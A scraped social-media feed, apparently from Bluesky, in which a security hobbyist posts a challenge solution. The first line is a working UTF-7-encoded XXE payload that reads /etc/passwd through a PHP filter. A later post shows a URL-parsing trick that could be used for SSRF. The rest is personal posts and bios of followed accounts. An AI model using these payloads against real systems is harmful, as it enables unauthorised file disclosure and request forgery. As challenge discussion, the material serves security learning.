<?xml version="1.0" encoding="UTF-7"?>+ADwAIQ-DOCTYPE data +AFsAPAAh-ENTITY xxe+ACA-SYSTEM +ACI-php://filter/convert.base64-encode/resource+AD0-/etc/passwd+ACIAPgBdAD4-+ADw-data+AD4APA-title+AD4-+ACY-xxe+ADsAPA-/title+AD4APA-/data+AD4
22.03.2025 20:12 β π 3 π 0 π¬ 0 π 0
Sorry if I'm interpenetrating wrong or ruining the competition. I really enjoined the article and learned something new! π My PoC uses UTF-7 and PHP filters to read arbitrary files. The PHP filters could probably be used to get RCE, but that is too long for a blsky post!
22.03.2025 20:12 β π 0 π 0 π¬ 1 π 0
I interoperate the words "post your solution" and "reply" as it's OK to share a solution publicly before the competition is finished. Just feels a bit strange π
22.03.2025 19:57 β π 0 π 0 π¬ 1 π 0
With "reply", do you mean comment our solution here?
22.03.2025 19:48 β π 0 π 0 π¬ 1 π 0
Better to just use the browser. No updates;)
11.03.2025 18:59 β π 0 π 0 π¬ 0 π 0
β¦ Depending on how the function is used, you would need to add one more colon to my original url to get a ssrf.
05.03.2025 14:16 β π 1 π 0 π¬ 0 π 0
This is just url parsing. The vuln comes from how you use the function I guess. ssrf could definitely become an issue here since hostname assumption is wrong
05.03.2025 14:12 β π 0 π 0 π¬ 2 π 0
regex <3 `https://example.com:pass@attacker.example.com`
04.03.2025 22:28 β π 0 π 0 π¬ 1 π 0
GitHub - martcl/nrk-former: LΓΈser NRK former med A*
LΓΈser NRK former med A*. Contribute to martcl/nrk-former development by creating an account on GitHub.
NRK former er et kult spill! Jeg har brukt de siste dagene pΓ₯ Γ₯ lage et program for Γ₯ finne den teoretiske beste poengsummen det er mulig Γ₯ fΓ₯. π«£ SΓ₯ hvis noen en gang sitter og lurer pΓ₯, hvordan Norges beste fikk sΓ₯ bra score;
github.com/martcl/nrk-f...
30.11.2024 10:51 β π 7 π 0 π¬ 0 π 0
Resident of Howard County, Maryland, USA. Occasional blogger. Staff writer for the Okazu yuri news and review site. Author of the book That Type of Girl: Notes on Takako Shimura's Sweet Blue Flowers.
Bug bounty & VDP platform trusted by the worldβs largest organisations! π
linktr.ee/hackwithintigriti
CEO of Bluesky, steward of AT Protocol.
dec/acc π± πͺ΄ π³
Norwegian indie game developer of Milkmaid of the Milky Way and Embracelet. Wishlist CASCADOU, my new game! www.machineboy.com
Blogging at https://nastystereo.com
Substack: http://lcamtuf.substack.com/archive
Homepage: http://lcamtuf.coredump.cx
Free web security training from PortSwigger.
Application Security and Cloud Security
Principal Training Architect @ HackTheBox
CTF Addict
"Potentially a legit researcher"
he/him
Website: https://0xdf.gitlab.io/
YouTube: https://www.youtube.com/c/0xdf0xdf
Twitter: 0xdf_
Discord: 0xdf
Mastadon: 0xdf@infosec.exchange
Application Security Engineer at @intigriti | OSWE | BSCP | https://hackerone.com/trein
Security Researcher π
Hacking Content @ https://yt.cryptocat.me π
Prog. leder for #dax18, innimellom ogsΓ₯ #dagsrevyen og #polkvart. Skrevet reiseguiden "London langs tuben" som kan kjΓΈpes direkte fra meg (utsolgt fra bokhandel)
Science teacher Education @NTNU π³π΄ π§ͺ | Author VΓ₯rt kjemiske liv (2023), Finding places (2020) /Jakten pΓ₯ stedsansen | Science textbook author Solaris 5-7 @aschehoug | Former TV host & Science journalist @NRK https://www.ntnu.edu/employees/unni.eikeseth
Principal engineer @ Sanity.io. he/him.
I code open source software and pet dogs.
https://espen.codes/
Eat, code, love. I make Mac apps and open-source.
https://sindresorhus.com/apps
Mastodon: https://mastodon.social/@sindresorhus
X: https://x.com/sindresorhus
π³π΄ Web Developer | React & Next.js | Microsoft MVP | International Conference Speaker | Consultant at crayonconsulting.no
Looking to find the joy of internet again βͺοΈ still a coder βͺοΈ Podcast @ kortslutning.fun βͺοΈ CTO @ variant.no βͺοΈ blog @ mib.im
developer edu and community @sanity.io \n (he/him) \n ask me about real-time text fields in front of delightful JSON \n endorsed for dry jokes on linkedin \n Oakland, CA \n π https://knut.fyi
Staff Software Engineer and founding employee @ Sanity.io. Working on the Sanity Studio. He/him.
